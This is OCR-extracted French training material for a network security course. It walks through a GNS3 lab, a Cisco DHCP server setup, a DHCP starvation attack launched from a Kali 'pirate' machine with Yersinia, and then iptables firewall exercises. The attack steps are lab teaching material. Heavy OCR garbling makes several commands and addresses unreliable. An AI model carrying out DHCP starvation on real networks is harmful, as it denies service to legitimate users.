par défaut. Cliquez ensuite sur Next. 


È New IOS router - c3725-adventerprisek9-mz.124-25d.image 


WIC modules 
Please choose the default WIC modules that should be inserted into every new instance of this router. 
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Etape 2 : Emulation de la topologie de réseau 


Sur la page Idle-PC, il vaut mieux ne pas modifier la configuration par 
défaut. Cliquez ensuite sur Finish. 


È New IOS router - c3725-adventerprisek9-mz.124-25d.image 


Idle-PC 
An idle-pc value is necessary to prevent IOS to use 100% of your processor or one of its cores. 


2 
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Comme illustré dans la figure ci-dessous, la Template Router a été 


créée avec succes. 


All devices 
|Filter 


ATM switch 


Cloud 


d Ethernet hub 


á Ethernet switch 


i - 
PAA] EtherSwitch 


Frame Relay switch 


NAT 


7 Router 


TS vcs 
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Étape 2 : Émulation de la topologie de réseau 


Pour créer manuellement une nouvelle Template d’une machine à partir d’une machine virtuelle créée sous VirtualBox, sélectionnez l'icône "+New Template ". 


Une nouvelle fenêtre intitulée New template s'ouvre, sélectionnez alors Une nouvelle fenêtre intitulée Preferences s'ouvre, sélectionnez alors 
Manually create a new template. Cliquez ensuite sur Next. VirtualBox VMs, et sélectionnez la VM Ubuntu. Cliquez ensuite sur Next. 


@ New tempiste ? G 


Bew template General VirtualBox VM templates | 


Fiesse select how you want to creste a mew template Server 
+ Gener’ 


GNS3 VM i i 
Pachet = x kali-linux-2022.1-virtualbox-amd64 Template name: ‘enb-finior-20?.! -virhsalhow-armdét 
Trata an agé fom the GNSS server (recommended) re captu Ternpiste ID: OHÔSET eH AITA S274 edt ace 
+ Built-in VirtualBox name: cab-firo-2022.! rrtuelbes-amd5t 
Ineort an spolance fie ( ens3e extension) Ethernet hubs = es 2 a 
©) Morually ceste anew template Ethernet switches SE 
Cloud nodes À hien Vmoallies YM template 


~vPcs 
VetenBax Virtual Machine 
VPCS nodes Meese dhosse à Virna viral madine from the bt 
” Dynamips 
105 routers 


” 106 on UNIX ‘Weber: Lisnt: 


IOU Devices 
+ QEMU Use aa a bad une WA (exgaremertal) 


Qemu VMs 
* VirtualBox 
VirtualBox VMs 
~ VMware 
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Etape 2 : Emulation de la topologie de réseau 


Terminez le processus de création en cliquant sur Apply puis Ok. Comme illustré dans la figure ci-dessous, la Template Ubuntu a été 
créée avec succes. 


> x 


VirtualBox VM templates 


All devices 
[Filter 


ATM switch 


Cloud 


be kall-tinux-2022.1-virtualbox-amd64 


Temetate nyme 
template D 
Virtualize name 
RAM 

Corus: 


= 
Hendieur mace emablect 
On chow: 

Linked base VM 
Cumuk type 

Auto slit cureuke 


d Ethernet hub 


Adapters 
+ 105 on UNIX nec 

10U Devices ype Inte! PRO OO MT Desesp (SAEN) 
+ QEMU 

Qemu VMs 
+ VirtualBox 


á Ethernet switch 


EX Laii-linux-2022.1-virtualbox-amd64 


NAT 


e=) Router 
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Etape 2 : Emulation de la topologie de réseau 


Importez les équipements nécessaires dans l’espace de travail, Cliquez sur le bouton Start/Resume all nodes. Une fenêtre de confirmation 
nommez-les, puis établissez les liens requis pour créer la topologie s'ouvre, cliquez alors sur Yes. 
comme illustré à la figure ci-dessus. 


Fa0/0 


Faula x Pirate_Kak 


E] 


È Confirm Start All 


© Are you sure you want to start all devices? 


Comme illustré dans la figure contre, tous les 
équipements sont actifs et prêts à être utilisés. 


A1 
— 
| 
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Étape 3 : Configuration du serveur DHCP 


Cette figure illustre les commandes exécutées pour activer l'interface 
FastEthernet 0/0 et lui attribuer une adresse IP 10.0.0.1. 


*Mar 1 00:00:04.451: %LINEPROTO-S-UPDOWN: Line protocol on Interface FastEthern 
et@/1, changed state to down 

Ri#configure terminal 

Enter configuration commands, one per line. End with CNTL/Z. 
Ri(config)#interface fa0/0@ 

Ri(config-if)#ip address 10.0.@.1 255.0.0.0 


Ri(config-if)#no shutdown 

Ri(config-if )#exit 

Ri(config)# 

*Mar 1 00:03:01.007: %LINK-3-UPDOWN: Interface FastEthernet@/@, changed state t 


o up 
*Mar 1 00:03:02.007: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthern 
et@/@, changed state to up 

Ri(config)# 


eee ee eee en nn 
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Cette figure illustre les commandes exécutées pour la création et la 
configuration du pool d’adresses DHCP. 


R1(config)# 

*Mar 1 00:03:01.007: %LINK-3-UPDOWN: Interface FastEthernet@/@, changed state t 
o up 

*Mar 1 00:03:02.007: %LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthern 
et@/@, changed state to up 

Rl(config)#service dhcp 

R1(config)#ip dhcp pool pool-1 

Ri(dhcp-config)#network 10.0.0.0 

Ri(dhcp-config)#default-router 10.0.0.1 

Ri(dhcp-config)#lease 1 

R1(dhcp-config)#exit 

Ri(config)#ip dhcp excluded-address 10.0.0.0 

R1(config)#exit 

R1#show 

*Mar 1 00:05:23.031: %SYS-5-CONFIG_I: Configured from console by console 
Ri#show ip dhcp pool pool-1 


Pool pool-1 : 
Utilization mark (high/low) : 100 / @ 
Subnet size (first/next) pat ey at 


Total addresses : 16777214 
Leased addresses “i | 
Pending event : none 
1 subnet is currently in the pol = 
Current index IP address range 
10.0.0.1 10.0.0.1 


Leased addresses 
- 180.255.255.254 @ 


R1# 


Activité 2 WO  WEBFORCE» 


OFPPT pE THE CHANGE 
Correction OF?’ 


Étape 4 : Vérification du bon fonctionnement du serveur DHCP 


e Pour vérifier le bon fonctionnement du serveur DHCP, nous allons vérifier si les machines Ubuntu (client DHCP) et Kali (pirate) peuvent recevoir des adresses IP du 
serveur DHCP. 


e Avant tout, il faut vérifier les liaisons d'adresse sur le serveur DHCP en exécutant la commande R1#show ip DHCP binding dans le terminal du routeur R1. 


e Comme illustré dans la figure ci-dessous, le résultat de l'exécution de la commande précédente illustre qu’il y a une seule adresse DHCP (10.0.0.3) qui a été attribuée. 
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Étape 4 : Vérification du bon fonctionnement du serveur DHCP 


e Cette figure illustre l'exécution des commandes permettant la libération de la 
configuration IP de la machine Ubuntu, la demande d’une nouvelle adresse IP, et 
l'affichage de l'adresse IP obtenue. 


e Le résultat illustré dans la figure montre que la machine Ubuntu a obtenu une adresse IP 
.10.0.0.2 


osboxes@osboxes: - 


$ sudo dhclient -r 
$ sudo dhclient 
S ip address show 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN gro 
up default qlen 1000 
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 
inet 127.0.0.1/8 scope host lo 
valid_lft forever preferred_lft forever 
inet6 ::1/128 scope host 
valid lft forever preferred lft forever 
2: enp0s3: <BROADCAST ,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel st 
ate UP group default glen 1000 
Link/ether 08:00:27:d9:6b:39 brd ff: ff: ff: ff: ff: ff 
inet 10.0.0.2/8 brd 160.255.255.255 scope global dynamic enp0s3 
valid_lLft 86390sec preferred_ lft 86390sec 
inet6 fe80: :66b1:5d64:94de:48df/64 scope Link noprefixroute 
valid_lft forever preferred_1ft forever 
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En vérifiant les liaisons d'adresses sur le serveur DHCP, nous pouvons 
remarqué l'ajout d’une nouvelle ligne démontrant l'attribution de 
l'adresse 10.0.0.2 à un nouveau client DHCP qui est la machine Ubuntu 


dans notre exemple. 


Ri#show ip dhcp binding 

Bindings from all pools not associated with VRF: 

IP address Client-ID/ Lease expiration 
Hardware address/ 
User name 

10.0.0.3 @108 .@027.95bd.54 Mar @2 2002 12:07 AM 


Ri#show ip dhcp binding 

Bindings from all pools not associated with VRF: 

IP address Client-ID/ Lease expiration 
Hardware address/ 


User name 
0800 .27d9.6b39 Mar @2 2002 12:10 AM 
0108.0027 .95bd.54 Mar 02 2002 12:07 AM 


Type 


Automatic 


Type 


Automatic 
Automatic 
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Etape 4 : Vérification du bon fonctionnement du serveur DHCP 


e Cette figure illustre l'exécution des commandes permettant la libération de la En vérifiant les liaisons d'adresses sur le serveur DHCP, nous pouvons 
configuration IP de la machine Kali, la demande d’une nouvelle adresse IP, et remarquer l'ajout d’une nouvelle ligne démontrant l'attribution de l'adresse 
l'affichage de l'adresse IP obtenue. 10.0.0.4 à un nouveau client DHCP qui est la machine Kali dans cet exemple. 


e Le résultat illustré dans la figure montre que la machine Kali a obtenu une 
adresse IP .10.0.0.4. 


kali@kali: - 


File Actions Edit View Help Ri#show ip dhcp binding 

Bindings from all pools not associated with VRF: 

IP address Client-ID/ Lease expiration Type 
Hardware address/ 

| User name 

10.0.0.2 0800.27d9.6b39 Mar @2 2002 12:10 AM Automatic 

110.0.0.3 0108.0027.95bd.54 Mar 02 2002 12:07 AM Automatic 

Ri#show ip dhcp binding 

Bindings from all pools not associated with VRF: 

IP address Client-ID/ Lease expiration Type 
Hardware address/ 
User name 
0800 .27d9.6b39 Mar @2 2002 12:10 AM Automatic 
0108.0027.95bd.54 Mar @2 2002 12:07 AM Automatic 
0800.2795.bd54 Mar @2 2002 12:12 AM Automatic 


4163<UP, BROADCAST , RUNNING, MULTICAST> 


= 
= 
m 
< 
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Étape 5 : Exécution de l’attaque DHCP Starvation 


Lancement de l'outil Yersinia depuis le terminal de la machine Kali (pirate). 


kali® kali 


$ 


Interface de l'outil Yersinia illustrant l'exécution de l'attaque DHCP 


Interface de l'outil Yersinia permettant le lancement de l'attaque DHCP starvation. l mes | é rs 
starvation via l'envoie des requêtes DHCP falsifiées. 


incl Choose protocol attack 
CDP DHCP 8021Q 802.1X DIP wae 
Choose attack 
0.0.0.0 255.255.255.255 01DISCOVER « 14 Mar 18:49:56 
0.0.0.0 255.255 2 01 DISCOVER : 14 Mar 18:49:56 
0.0.0.0 2 2 01 DISCOVER 14 Mar 18:49: 
0.0.0.0 255.255.25 5 O1DISCOVER  eth0 14 Mar 18:49:56 
0.0.0.0 255.25 5§ 5 O1DISCOVER  eth0 14 Mar 18:49:56 
0.0.0.0 01DISCOVER  eth0 14 Mar 18:49:56 


DoS 
sending RAW packet 
@ sending DISCOVER packet 


creating DHCP roque server 


sending RELEASE packet 


0.0.0.0 OTDISCOVER  eth0 14 Mar 18:49:56 
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Étape 5 : Exécution de l’attaque DHCP Starvation 


Il est aussi possible d'analyser le trafic généré par la machine Kali en utilisant l’outil d'analyse Wireshark, qui est installé par défaut avec GNS3. 


Pour lancer Wireshark, il suffit de cliquer avec le bouton droit sur le câble 
liant la machine Kali et le commutateur. Sélectionnez ensuite l'option Start 
capture. 

Une fenêtre de capture de paquets s'ouvre comme illustré dans la figure ci- 
dessous, cliquez alors sur OK. 


èe Packet capture 


Link type: |Ethemet 


Meneame: Prate Kai Ethernet to Switch FastEhenetii 


V Start the capture visualization program 


La figure ci-dessous est un extrait de la capture du trafic collectée lors de l'exécution de 
l'attaque DHCP starvation. 


4 Capture en cours de - [Pirate_Kali Ethernet0 to Switch FastEthernet1/1] 


Fichier Editer Vue Aller Capture Analyser Statistiques Telephonie Wireless Outils Aide 


SE eear 


Protocol Length Info 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 
286 DHCP Discover 


Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 
Transaction ID @x643c9869 


49406 15.965603 
49407 15.966129 
49408 15.966223 
49409 15.966258 
49410 15.966285 
49411 15.966348 
49412 15.966430 
49413 15.966504 
49414 15.966579 
49415 15.966673 
49416 15.966738 
49417 15.966816 
49418 15.966898 


SSSSusssn 
SSSSESAES 


"dhc" is neither a field nor a protocol name. || Paquets: 49418 - Affichés: 49418 (100.0%) || Profile: Default 
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Étape 5 : Exécution de l’attaque DHCP Starvation 
Cette figure illustre le résultat de la commande R1# show ip dhcp binding exécutée Cette figure illustre le résultat de la commande R1# show ip dhcp binding 
lors de la réalisation de l'attaque DHCP starvation. Elle montre que le serveur DHCP exécutée après la réalisation de l’attaque DHCP starvation. Elle montre que le 
est inondé et ne peut pas répondre à n'importe quel type de requête. serveur DHCP a attribué plusieurs adresses dynamiques. 
EP RI — oO x 


A 


Remarques 


En essayant de libérer et de renouveler l'attribution de l'adresse à la machine Ubuntu lors de 
l'exécution de l'attaque, vous pouvez noter que la machine Ubuntu ne peut pas recevoir une 
nouvelle adresse de la part du serveur DHCP (qui est inondé). 
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PARTIE 2 
PROTEGER LE SI 


Dans ce module, vous allez : 


e Configurer un pare-feu 


e Appliquer les bonnes pratiques et la configuration des outils 
nécessaires pour sécuriser un système d'exploitation 


CG) 18 heures 
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À me CHANGE ACTIVITÉ 1 


S’INITIER À L'UTILISATION DU PARE-FEU 
IPTABLES 


Compétences visées : 


Configurer un pare-feu (IPTABLES) 


Recommandations clés : 


Maitriser le principe du fonctionnement d’un pare-feu 
logiciel 


CONSIGNES 


KO  WEBFORCE s 
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1. Pour le formateur 


° Vapprenant doit être capable de configurer iptables en partant de la stratégie de 
sécurité définie dans un énoncé. 


2. Pour l’apprenant 


° Il est recommandée de maitriser le principe du fonctionnement d’un pare-feu 
° Il faut utiliser le syntaxe des commandes fournis au début de l'activité 
° Il est également recommandée de suivre les étapes décrites dans l'énoncé 


3. Conditions de réalisation : 
° VirtualBox installé 


° Une machine Virtuelle Ubuntu. Lien de téléchargement de la VM Ubuntu : 
https://www.osboxes.org/ubuntu/#ubuntu-21-10-info 


4. Critéres de réussite : 
° Avoir un pare-feu configuré selon la stratégie de sécurité définie dans l’énoncé 


° Réaliser avec succès les tests de vérification demandés dans l'énoncé 
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Étape 1 : S’initier à iptables 
e L'objectif principal de cette activité est d'apprendre à configurer un pare-feu. Comme exemple de pare-feu, nous allons utiliser iptables. 


e Iptables est un outil de ligne de commande et un pare-feu Linux permettant de configurer, maintenir et inspecter des tableaux de filtrage de paquets. 


e Tous les paquets inspectés par iptables passent par une séquence de tables intégrées (INPUT, OUTPUT, ou FORWARD) pour être traités. Chacun de ces tableau est 
dédiée à un type particulier d'activité de paquets et est contrôléepar une chaîne de transformation/filtrage de paquets associée. 


e Iptables est basé sur trois tableaux de filtrage de paquets qui sont : 
e INPUT : contrôle les paquets entrants sur la machine ; 
e FORWARD : filtre les paquets qui entrent sur la machine mais doivent être transférés ailleurs ; 


e OUTPUT : contrôle les paquets sortant de la machine. 


e Toute commande iptables prend la forme suivante : 


$ sudo iptables —t <type de tableau> <action> <direction> <conditions> -j <ce qu'il faut faire> 


e En ce qui suit nous détaillons le contenu des éléments qui peuvent être inclus dans une commande iptables. 


N 
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Étape 1 : S’initier à iptables 


Le tableau suivant détaille les éléments qui peuvent être inclus dans une commande iptables : 


temens | conta | atone 


-t --table 
<Type de tableau> Filtre par défaut 
-A: append Ajouter une règle à la chaîne iptables 
-D: delete Supprimer la règle qui correspond 
<action> -L: list Lister toutes les regles 
-F: Flush Supprimer toutes les regles 
-P: policy Modifier la stratégie par défaut 
INPUT Filtrage des paquets entrants 
<direction> OUTPUT Filtrage des paquets sortants 
N FORWARD Filtrage des paquets entrants et à transférer 
Lu ACCEPT Le paquet est accepté sur l'interface entrante 
= DROP Le paquet est bloqué. Aucun message d'erreur n'est renvoyé 
< <ce qu'il faut faire> REJECT Le paquet est bloqué. Un message d'erreur est renvoyé 
LOG Les informations sur le paquet sont envoyées au démon syslog pour la journalisation et 


iptables continue le traitement avec la règle suivante dans la table 
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-s <ip> 
-d <ip> 
-i <eth> 
<conditions> 
-o <eth> 
-p <protocole> --dport <num> 


-p <protocole> --sport <num> 


N 
= 
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Spécifier une adresse IP source 

Spécifier une adresse IP destination 

Spécifier une interface d’entrée (Input) 

Spécifier une interface de sortie (Output) 
Spécifier le port destination d’un protocole donné 


Spécifier le port source d’un protocole donné 
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Étape 1 : S’initier a iptables 


Le tableau ci-dessous décrit certains exemples de commandes iptables qui vous servent par la suite pour configurer proprement votre pare-feu. 


sudo iptables —A INPUT -p tcp -m tcp --dport 23 -j DROP Bloque les connexions TCP entrantes au port 23 

sudo iptables -A OUTPUT -p udp -m tcp --sport 53 -j DROP Bloque les connexions UDP sortantes du port 53 

sudo iptables —A INPUT —i eth0 -p tcp --dport 22 -m state --state NEW, Accepte les demandes d'établissement de nouvelles connexions et 
ESTABLISHED -j ACCEPT datagramme faisant partie d'une connexion déja établie 
sudo iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT Accepte les echo-request (paquet icmp de type 8) sortantes 


e Enregistrement des scripts iptables : 
e Si vous redémarrez la machine, la configuration d'iptables disparaîtra. 
e Pour enregistrer la configuration et la faire démarrer automatiquement, les deux commandes iptables-save et iptables-restore peuvent être utilisées. 


e #iptables-save > /etc/iptables.rules 


N 
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e #iptables-restore < /etc/iptables.rules 
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Étape 2 : Travail demandé 


e Après avoir examiné les notions fondamentales de iptables, passons maintenant à tester certaines commandes. Pour ce faire, vous êtes chargés de suivre les étapes 
suivantes et répondre aux questions : 


1. Démarrez votre machine virtuelle Ubuntu et ouvrez son terminal ; 

e Il vaut mieux que le mode d’accés réseau de votre machine virtuelle soit Accès par pont. 
Vérifiez que iptables est installé dans votre machine Ubuntu ; 
Listez les règles du pare-feu iptables ; 
Selon le résultat obtenu dans la question précédente, quel est la stratégie par défaut de iptables ? 
Essayez de pinguer depuis la machine hôte vers la machine virtuelle ; 
Ajoutez la règle appropriée permettant de bloquer la réception des écho-requests du protocole ICMP ; 
Listez de nouveaux les règles du pare-feu iptables ; 


Essayez de pinguer depuis la machine hôte vers la machine virtuelle ; 


w -0 N A n e © © 


Essayez de pinguer l'url suivant www.google.com depuis la machine virtuelle ; 


m. 
j=) 


. Ajoutez la règle appropriée permettant de bloquer l'envoi des écho-requests du protocole ICMP ; 


= 
j 


. Essayez de nouveau de pinguer l’url suivant www.google.com depuis la machine virtuelle ; 


N 
= 
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m. 
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. Enregistrez la configuration effectuée ; 


m. 
w 


. Supprimez les règles du pare-feu iptables. 
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Etape 2 : Travail demandé 

e Comme illustré dans la figure ci-dessous, pour vérifier que iptables est bien installée dans votre machine Ubuntu, il suffit de taper les commandes suivantes : 
e sudo iptables 
e sudo iptables -h 


e Selon le résultat illustré dans la figure ci-contre, la version du pare-feu iptables est 1.8.7. 


$ sudo iptables 
[sudo] nassword for osboxes: 
iptables v1.8.7) (nf tables): no command specified 
Try iptables -h' or ‘iptables --help' for more information. 
$ sudo iptables -h 


Ef Remarques 


En cas ou iptables n’est pas installé dans votre machine, il suffit de 
taper les commandes suivantes : 

e sudo apt-get update 
e sudo apt-get install iptables 


iptables v1.8.7 


Usage: iptables -[ACD] chain rule-specification [options] 
iptables -I chain [rulenum] rule-specification [options] 
iptables -R chain rulenum rule-specification [options] 
iptables -D chain rulenum [options] 
iptables -[LS] [chain [rulenum]] [options] 
iptables -[FZ] [chain] [options] 
iptables -[NX] chain 
iptables -E old-chain-name new-chain-name 
iptables -P chain target [options] 
iptables -h (print this help information) 
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Etape 2 : Travail demandé 
e Pour lister les règles du pare-feu iptables, il suffit de taper la commande : sudo iptables -L 
$ sudo iptables -L 


Chain INPUT |(policy ACCEPT) 
target prot opt source destination 


Chain FORWARD |(policy ACCEPT) 


target prot opt source destination 


Chain OUTPUT {policy ACCEPT) 
target prot opt_source destination 


e Selon le résultat illustré dans la figure ci-dessus, la stratégie par défaut de iptables est ACCEPT 


e Le résultat de la commande sudo iptables -L démontre qu'aucune 
regle de filtrage n’est configuré dans iptables 

e La stratégie par défaut est ACCEPT 

e Par conséquent, aucun filtrage de paquet n'est appliqué par iptables 


N 
= 
m 
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Pour réaliser des test de type ping depuis la machine hôte vers la machine 
virtuelle Ubuntu, il faut : 


1. Identifier l'adresse IP de la machine virtuelle Ubuntu, en tapant dans son 
terminal la commande : ifconfig ou ip address show 


Le résultat obtenu démontre que l'adresse IP est : 192.168.0.162 


Ces résultats sont obtenus avec la configuration par défaut de 
iptables illustrée précédemment. 


2. Depuis l'invite de commande de la machine hôte, tapez la commande ping 
suivie de l'adresse IP identifiée précédemment : 


Ping 192.168.0.162 


Le résultat obtenu démontre que la machine virtuelle répond aux requêtes 
ICMP envoyées de la part de la machine hôte. 
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:-$ ifconfig 

enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 

inet [192.168.060.162] netmask 255.255.255.0 broadcast 192. 
168.0.255 

inet6 fe80::53e:4b98:ec44:be26 prefixlen 64 
Q@<Link> 

ether 08:00:27:36:85:0b txqueuelen 1000 

RX packets 487 bytes 87216 (87.2 KB) 

RX errors 0 dropped @ overruns @ frame 0 

TX packets 289 bytes 41416 (41.4 KB) 

TX errors © dropped 0 overruns 0 carrier 0 


scopeid 0x2 


(Ethernet) 


collisions 


C:\Users\HP>ping 192.168.0.162 


32 octets de données : 
TTL=64 
TTL=64 
TTL=64 
TTL=64 


Envoi d’une requête ‘Ping’ 192.168.0.162 avec 


de 192.168.0.162 : 
de 192.168.0.162 : 
de 192.168.0.162 : 
de 192.168.0.162 : 


octets=32 temps<ims 
octets=32 temps<ims 
octets=32 temps<ims 
octets=32 temps<ims 


Statistiques Ping pour 192.168.090.162: 

Paquets : envoyés = 4, reçus = 4, perdus = @ (perte 0%), 
Durée approximative des boucles en millisecondes : 

Minimum = @ms, Maximum = @ms, Moyenne = @ms 


La règle permettant de bloquer la réception des écho-requests du protocole 
ICMP est obtenue suite à l'exécution de la commande suivante 
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP 


l'exécution de la commande précédente ainsi que la règle ajoutée dans 
iptables sont illustrées dans la figure ci-contre. 


Pour tester la nouvelle règle configurée dans iptables, il suffit d'exécuter la 
commande ping 192.168.0.162 depuis l'invite de commande de la machine 
hôte 

Le résultat illustré dans la figure ci-contre démontre que la machine Ubuntu 
n’a pas répondu aux écho-request reçus et cela est du au fait que iptables a 
bloquer la réception de ce type de requêtes. 
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$ sudo iptables -A INPUT -p icmp --icmp-type ech 


o-request -j DROP 
[sudo] password for osboxes: 
:-$ sudo iptables -L 
Chain INPUT (policy ACCEPT) 
prot opt source 


p echo- request 


Chain FORWARD (policy ACCEPT) 
target prot opt source 


Chain OUTPUT (policy ACCEPT) 
prot opt source 


target 
C:\Users\HP>ping 192.168.0.162 


Envoi d’une requête ‘Ping’ 
Délai d’attente de la demande dépassé. 
Délai d’attente de la demande dépassé. 
Délai d’attente de la demande dépassé. 
Délai d’attente de la demande dépassé. 


Statistiques Ping pour 192.168.0.162: 
Paquets 


: envoyés = 4, reçus = @, perdus 


destination 


destination 


destination 


192.168.0.162 avec 32 octets de données : 


= 4 (perte 100%), 


Le résultat de la commande ping www.google.com exécutée depuis le terminal de la 
machine virtuelle est illustré dans la figure ci-contre. Ce résultat démontre que la 
machine virtuelle a pu envoyer des requêtes ICMP de type echo-request est que le 
serveur du site web www.google.com a répondu à ces requêtes. 


La règle permettant de bloquer l'envoie des écho-requests du protocole ICMP est 
obtenue suite à l'exécution de la commande suivante : 
sudo iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP. 


Vexécution de la commande précédente ainsi que la nouvelle configuration de 
iptables (qui inclue la nouvelle régle) sont illustrées dans la figure ci-contre 


Le résultat de la commande ping www.google.com exécutée apres avoir effectuée la 
nouvelle configuration de iptables est illustré également dans la figure ci-contre . Ce 
résultat démontre que la machine virtuelle n’a pas pu envoyer des requêtes ICMP de 
type echo-request au serveur du site web www.google.com 
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$ ping www.google.com 

PING www.google.com (172.217.21.4) 56(84) bytes data. 

64 bytes from fra07s29-in-f4.1e100.net (172.217.21.4): icmp seq=1 
ttl=112 time=58.1 ms 

64 bytes from mrs09s10-in-f4.1e100.net (172.217.21.4): icmp_seq=2 
ttl=112 time=57.4 ms 

64 bytes from muc11s13-in-f4.1e100.net (172.217.21.4): icmp seq=3 
ttl=112 time=60.3 ms 

64 bytes from mrs09s10-in-f4.1e100.net (172.217.21.4): icmp seq=4 
ttl=112 time=58.3 ms 

aE 

www.google.com ping statistics 

4 packets transmitted, 4 received, 0% packet loss, time 3005ms 

rtt min/avg/max/mdev = 57.439/58.546/60.274/1.051 ms 


$ sudo iptables -A OUTPUT -p icmp --icmp-type ec 
ho-request -j DROP 
:-$ sudo iptables -L 
Chain INPUT (policy ACCEPT) 
target prot opt source 
DROP icmp -- anywhere 
p echo-request 


destination 
anywhere 


Chain FORWARD (policy ACCEPT) 


target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 


icmp -- anywhere 
echo- request 
:-$ ping www.google.com 
PING www.google.com (172.217.21.4) 56(84) bytes of data. 
a © 
--- Www.google.com ping statistics --- 
9 packets transmitted, © received, 100% packet loss, time 8169ms 
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Etape 2 : Travail demandé 


e Afin d’enregistrer la configuration du pare-feu iptables, il suffit d'exécuter la commande iptables-save > /etc/iptables.rules en mode super utilisateur. 


$ sudo su 


root@osboxes : /home/osboxes# iptables-save > /etc/iptables.rules 


e Pour supprimer les règles configurées au sein de iptables, il suffit de taper la commande : sudo iptables -F 


:-$ sudo iptables -F 
:-$ sudo iptables -L 
Chain INPUT (policy ACCEPT) 
target prot opt source destination 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
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CONFIGURER IPTABLES EN UTILISANT UNE 
STRATÉGIE PAR DÉFAUT DROP 


Compétences visées : 


Effectuer une configuration avancée d’un pare-feu (IPTABLES) 


Recommandations clés : 


Maitriser le principe du fonctionnement d’un pare-feu 
logiciel 


CONSIGNES 
O WEBFORCE s 


OFPPT BE THE CHANGE | 


La Vote de l'Avenir 


1. Pour le formateur 


° Vapprenant doit être capable de configurer iptables en partant de la stratégie de 
sécurité définie dans un énoncé. 


2. Pour l’apprenant 


° Il est recommandée de maitriser le principe du fonctionnement d’un pare-feu 
° Il faut utiliser le syntaxe des commandes fournie au début de l’activité précédente 
° Il est également recommandé de suivre les étapes décrites dans l'énoncé 


3. Conditions de réalisation : 


° VirtualBox installé 
° Une machine Virtuelle Ubuntu qui a été utilisée dans l’activité 2. 


° Réalisation de l’activité précédente avec succès. 


4. Critères de réussite : 


° Avoir un pare-feu configuré selon la stratégie de sécurité définie dans l’énoncé 


° Réaliser avec succès les tests de vérification demandés dans l'énoncé 


THE CHANG 
Configurer iptables en utilisant une stratégie par défaut |) SE J 


DROP 


Étape 1 : Préparation de l’environnement de travail 


e L'objectif principal de cette étape est de préparer l’environnement dans lequel l’activité sera réalisée. 


e La préparation de l’environnement de travail consiste essentiellement à installer des outils qui nous servirons pour tester l'efficacité des règles configurées 
au sein du pare-feu iptables 


e Les outils à installer sont principalement : 
e Dans la machine hôte : le client Telnet dans la machine hôte 
e Dans la machine virtuelle Ubuntu : 
1. Le serveur Telnet 
2. Netstat 
3. Serveur ssh 
4. Lynx 


e Travail demandé : vous êtes chargés dans cette étape de préparer l’environnement de travail en installant les outils cités précédemment. 
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DROP 


Étape 2 : Configuration du pare-feu iptables 


e Après avoir préparé l’environnement de travail, l'objectif principal de cette activité est d’implémenter une stratégie de sécurité dans le pare-feu iptables en partant 
d’une stratégie par défaut DROP. 


e La stratégie de sécurité à implémenter est la suivante : 


A. La machine Ubuntu doit être capable d'envoyer des paquet ICMP de type echo-request et de recevoir des paquets ICMP de type echo-reply (un tel message 
doit être journalisé, tout en laissant iptables préfixer les messages de journal avec la chaîne "echo reply received") ; 


B. La machine Ubuntu doit être capable de générer des messages ICMP "destination-unreachable" ; 
C. La machine virtuelle peut se connecter à des serveurs Web à l'aide de connexions HTTP sécurisées, à l'exception du site webwww.facebook.com. 
e Utilisez la commande nslookup www.facebook.com pour déterminer l'adresse IP du site Web 
D. Toutes les connexions TCP de l'hôte principal vers la machine Ubuntu sont possibles, à l'exception des connexions Telnet. 
e Travail demandé : Vous êtes chargées de : 
1. Changer la politique par défaut de iptables a DROP ; 
2. Implémenter la stratégie définie ci-dessus ; 
3. Effectuer des tests de vérification pour vérifier l'efficacité de la configuration effectuée ; 


4. Enregistrer la configuration effectuée ; 
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5. Supprimer la configuration effectuée. 
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Étape 1 : Préparation de l’environnement de travail 


e Pour installer le client Telnet dans la machine hôte (qui est une machine Windows), il suffit de suivre les étapes suivantes : 


1. Accédez à Programmes et fonctionnalités et sélectionnez Activer ou désactiver des fonctionnalités Windows. 


= Programmes et fonctionnalités 
6] 


Désinstaller un programme | @ Activer ou désactiver des fonctionnalités Windows 
Afficher les mises à jour installées 


Exécuter des programmes conçus pour des versions précédentes de Windows 
Comment installer un programme 


1. Une fenêtre intitulé Fonctionnalités de Windows s'affiche, sélectionnez alors Client Telnet. 
2. Cliquez ensuite sur OK. É Fonctionnalités de Windows o 


X 
Activer ou désactiver des fonctionnalités Windows @ 


Pour activer une fonctionnalité, activez la case à cocher correspondante. 
Pour désactiver une fonctionnalité, désactivez la case à cocher 
correspondante. Une case à cocher pleine signifie qu'une partie de la 
fonctionnalité est activée. 


Œ m | «NET Framework 3.5 (inclut .NET 2.0 et 3.0) 
a [m] | .NET Framework 4.8 Advanced Services 
LI) | Bac à sable Windows 
PM! | Client Dossiers de travail 


elnet 


[I | Client TFTP 
[|_| Composants hérités 

Of Conteneurs 

[|_| Data Center Bridging 
í > 
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Étape 1 : Préparation de l’environnement de travail 


Pour installer le serveur Telnet dans la machine virtuelle Ubuntu, il suffit de suivre les étapes suivantes : 


$ sudo apt-get install xinetd telnetd 
Reading package Lists... Done 
1. Installez les services xinetd et telnetd en exécutant la commande suivante : Building dependency tree... Done 
sudo apt-get install xinetd telnetd Reading state information... Done — 
he following NEW packages will be installed: 
telnetd xinetd 
© upgraded, 2 newly installed, © to remove and 180 not upgraded. 
d to get 147 kB of arch 
After this operation, additional disk space will be used. 
